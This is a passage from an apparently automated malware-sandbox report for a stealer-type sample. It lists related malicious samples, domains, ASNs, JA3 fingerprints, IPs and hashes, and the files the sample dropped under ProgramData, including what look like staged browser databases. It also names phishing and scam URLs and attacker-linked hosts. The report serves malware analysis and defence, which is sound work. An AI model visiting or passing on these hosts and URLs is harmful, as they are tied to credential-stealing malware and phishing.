                                        rqdYnT5Mf1.exeGet hashmaliciousRedLineBrowse
                                          UwC67bObmD.exeGet hashmaliciousRedLineBrowse
                                            6a27NdesoV.exeGet hashmaliciousRedLineBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              steamcommunity.comLisectAVT_2403002B_272.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                              • 23.192.247.89
                                              LisectAVT_2403002B_344.exeGet hashmaliciousBdaejec, VidarBrowse
                                              • 23.207.106.113
                                              LisectAVT_2403002C_60.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                              • 23.199.218.33
                                              LisectAVT_2403002C_67.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                              • 23.199.218.33
                                              LisectAVT_2403002C_81.exeGet hashmaliciousVidarBrowse
                                              • 23.197.127.21
                                              35fcdf3a.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                              • 23.192.247.89
                                              Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                                              • 23.192.247.89
                                              subsoft.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                              • 23.197.127.21
                                              CloudInstaller.zipGet hashmaliciousUnknownBrowse
                                              • 23.192.247.89
                                              FusionLoader v2.1.exeGet hashmaliciousUnknownBrowse
                                              • 23.199.218.33
                                              arpdabl.zapto.orgBootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                              • 77.91.101.71
                                              Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                                              • 77.91.101.71
                                              subsoft.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                              • 77.91.101.71
                                              hOYGfIcBVf.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 77.91.101.71
                                              file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                              • 77.91.101.71
                                              MN3OAv98T9.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 77.91.101.71
                                              file.exeGet hashmaliciousVidarBrowse
                                              • 77.91.101.71
                                              file.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                              • 77.91.101.71
                                              file.exeGet hashmaliciousVidarBrowse
                                              • 77.91.101.71
                                              c23b4a05be1b5587fe7d4283c7a99e44b695f486db8f225f5eabf9d7df75f37a_payload.exeGet hashmaliciousLummaC, VidarBrowse
                                              • 77.91.101.71
                                              fp2e7a.wpc.phicdn.net7Y18r(190).exeGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              7Y18r(192).exeGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              7Y18r(205).exeGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              7Y18r(218).exeGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              Endermanch@LPS2019.exeGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              wEcynzTTVF.exeGet hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              http://discord-proxy.tassadar2002.workers.dev/Get hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              https://metamaskwalletexetention.webflow.io/Get hashmaliciousUnknownBrowse
                                              • 192.229.221.95
                                              http://56edthdxfhbx.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                              • 192.229.221.95
                                              http://telstra-107436.weeblysite.com/Get hashmaliciousUnknownBrowse
                                              • 192.229.221.95

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              AKAMAI-ASUSMy Info Tech Partner Executed Agreement Docs#071999(Revised).pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 23.38.98.104
                                              file.exeGet hashmaliciousPython Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, VidarBrowse
                                              • 2.19.126.145
                                              fu[1].exeGet hashmaliciousBdaejecBrowse
                                              • 2.19.126.145
                                              http://stone003.stone168.cloudns.org/Get hashmaliciousUnknownBrowse
                                              • 2.19.126.80
                                              http://worker-winter-voice-2d98.mlzfuyun.workers.dev/Get hashmaliciousUnknownBrowse
                                              • 23.44.111.16
                                              http://cloud.15922894802.workers.dev/Get hashmaliciousUnknownBrowse
                                              • 2.19.126.80
                                              LisectAVT_2403002A_208.exeGet hashmaliciousUnknownBrowse
                                              • 2.19.126.202
                                              LisectAVT_2403002A_208.exeGet hashmaliciousUnknownBrowse
                                              • 2.19.126.202
                                              https://forms.office.com/Pages/ResponsePage.aspx?id=4Kydhlha3USXUsGxfRX-jBHWmjJmsZxDrR9zl3guaTNURU9US0pPQldQMFdROEtOVUJYRlJER1pIMi4uGet hashmaliciousUnknownBrowse
                                              • 2.18.121.134
                                              phish_alert_sp2_2.0.0.0-1.emlGet hashmaliciousHTMLPhisherBrowse
                                              • 184.28.90.27
                                              HETZNER-ASDEA9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                              • 188.40.141.211
                                              C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                              • 159.69.71.228
                                              be1c79275d836696a00b258d15a8b337a8c9beb8198a5bd3d5aaf64d660c8005_dump.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 188.40.141.211
                                              EF2D1DE8BE7B216F6983BD43D120B512A0917EBE887F30D256ECA8395CE613CC.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                                              • 188.40.141.211
                                              Endermanch@MEMZ.exeGet hashmaliciousBdaejec, KillMBRBrowse
                                              • 116.202.167.133
                                              file.exeGet hashmaliciousSystemBCBrowse
                                              • 135.181.90.229
                                              file.exeGet hashmaliciousSystemBCBrowse
                                              • 159.69.28.147
                                              http://appinforyvjhf6454ms1a.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                              • 195.201.57.90
                                              LisectAVT_2403002A_172.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                              • 144.76.154.59
                                              LisectAVT_2403002A_207.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                              • 144.76.154.59

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              51c64c77e60f3980eea90869b68c58a8LisectAVT_2403002B_159.dllGet hashmaliciousDridex DropperBrowse
                                              • 5.75.212.60
                                              LisectAVT_2403002B_218.exeGet hashmaliciousUnknownBrowse
                                              • 5.75.212.60
                                              LisectAVT_2403002B_218.exeGet hashmaliciousUnknownBrowse
                                              • 5.75.212.60
                                              LisectAVT_2403002B_273.dll.dllGet hashmaliciousCobaltStrikeBrowse
                                              • 5.75.212.60
                                              LisectAVT_2403002B_273.dll.dllGet hashmaliciousCobaltStrikeBrowse
                                              • 5.75.212.60
                                              c12.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                              • 5.75.212.60
                                              c12.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                              • 5.75.212.60
                                              c16.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                              • 5.75.212.60
                                              c18.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                              • 5.75.212.60
                                              c17.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                              • 5.75.212.60
                                              37f463bf4616ecd445d4a1937da06e197Y18r(169).exeGet hashmaliciousCryptOneBrowse
                                              • 23.192.247.89
                                              7Y18r(203).exeGet hashmaliciousUpatreBrowse
                                              • 23.192.247.89
                                              TBw6qwEBHZ.exeGet hashmaliciousBlackMoon, Neshta, XRedBrowse
                                              • 23.192.247.89
                                              A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                              • 23.192.247.89
                                              DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                                              • 23.192.247.89
                                              PgrZ7RuW1I.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                              • 23.192.247.89
                                              E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                                              • 23.192.247.89
                                              Endermanch@7ev3n.exeGet hashmalicious7ev3n, Bdaejec, UACMeBrowse
                                              • 23.192.247.89
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 23.192.247.89
                                              file.exeGet hashmaliciousUnknownBrowse
                                              • 23.192.247.89

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousPython Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, VidarBrowse
                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                  Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                                    azeyNF3kkf.exeGet hashmaliciousStealc, VidarBrowse
                                                      Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                                                        file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                          Nin6JE44ky.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                            file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                              file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                                file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                                  C:\ProgramData\mozglue.dllfile.exeGet hashmaliciousPython Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, VidarBrowse
                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                      Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                                                                        azeyNF3kkf.exeGet hashmaliciousStealc, VidarBrowse
                                                                          Setup .exeGet hashmaliciousGo Injector, MicroClip, Vidar, XmrigBrowse
                                                                            file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                              Nin6JE44ky.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                                file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                                                    file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse

                                                                                      Created / dropped Files

                                                                                      C:\ProgramData\BKECFIIEHCFH\AAAAAA

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\BKECFIIEHCFH\AAAAAA-shm

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.017262956703125623
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\BKECFIIEHCFH\AAFBAK

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):9571
                                                                                      Entropy (8bit):5.536643647658967
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                      MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                      SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                      SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                      SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                      C:\ProgramData\BKECFIIEHCFH\CBGCAF

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):5242880
                                                                                      Entropy (8bit):0.037963276276857943
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                      MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                      SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                      SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                      SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\BKECFIIEHCFH\CBGCAF-shm

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.017262956703125623
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                      Malicious:false
                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\BKECFIIEHCFH\CBKJJE

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                      Category:dropped
                                                                                      Size (bytes):159744
                                                                                      Entropy (8bit):0.7873599747470391
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                      MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                      SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                      SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                      SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\BKECFIIEHCFH\DAECFI

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\BKECFIIEHCFH\EHDGCG

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\BKECFIIEHCFH\GCAKKE

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\BKECFIIEHCFH\HIIIEG

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\BKECFIIEHCFH\KEBFHI

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):126976
                                                                                      Entropy (8bit):0.47147045728725767
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                      MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                      SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                      SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                      SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSBuild.exe_b4e850e31eb658e13b8188b64312891c20d49c48_a8ac0c99_603ae6f3-a36f-40bb-9d2a-359e4df06a57\Report.wer

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):1.1788802555381488
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:TMncOlfc0Nvw4sjMAZrdAmAFzuiFUZ24IO8q:IvlfXNvwpjJaFzuiFUY4IO8q
                                                                                      MD5:0C73DD3FEC2011D481678F692ED9DAA9
                                                                                      SHA1:A3B0652CE199FD20FAE5DE42E714572B02371850
                                                                                      SHA-256:2BE80F4190C614C4D4225649EC4A0D2F4A1D63A3A3EB61DCC47B048903BE68DB
                                                                                      SHA-512:45D45871D296DA1ED29CACC66711334430C3495C62449453FC436308FA35447A34B5572E4DAC128141B2C309385EBAEA5989953B7AF0466A7B39CF91E2337169
                                                                                      Malicious:false
                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.3.0.3.0.9.0.4.6.4.1.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.3.0.3.0.9.7.1.8.2.9.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.3.a.e.6.f.3.-.a.3.6.f.-.4.0.b.b.-.9.d.2.a.-.3.5.9.e.4.d.f.0.6.a.5.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.8.7.3.f.3.e.4.-.f.8.6.d.-.4.7.2.c.-.8.5.a.d.-.8.4.7.e.e.2.1.0.4.6.f.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.7.0.-.0.0.0.1.-.0.0.1.4.-.2.9.e.3.-.c.0.a.1.f.9.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.6.2.5.6.a.0.1.5.9.6.8.8.f.0.5.6.0.b.0.1.5.d.a.4.d.9.6.7.f.4.1.c.b.f.8.c.9.b.

                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2467.tmp.dmp

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 15 streams, Fri Jul 26 01:18:29 2024, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):174092
                                                                                      Entropy (8bit):1.9646624726691797
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:UhIXk4Qlu5ZRAAQOlAhfuo+7gcuj09WEBUKpcQDAGYTyYU/LaJzalnIyGAYbhJx:JXk4F5ZRoOlAhfuotjKUibm1iLa0TOhz
                                                                                      MD5:352BCD450123D14C13B789FF6E0EC27C
                                                                                      SHA1:DE0C0DE45484E09E6F93D9903979D7D51547F8D8
                                                                                      SHA-256:CBF28071D3BB696BE1AB5FAA0CD9E80E45C0D0483408CD05F50FE495B79B934F
                                                                                      SHA-512:E54FD6399A3EB2D9D0554417BD6F4C61FF6276CBE0C2126AD77260D1F55DB8249C4C8C7B2F6058DD665DBAB94FBD3416B76F8D084F7E9F1A4D89DDB9FF4C2595
                                                                                      Malicious:false
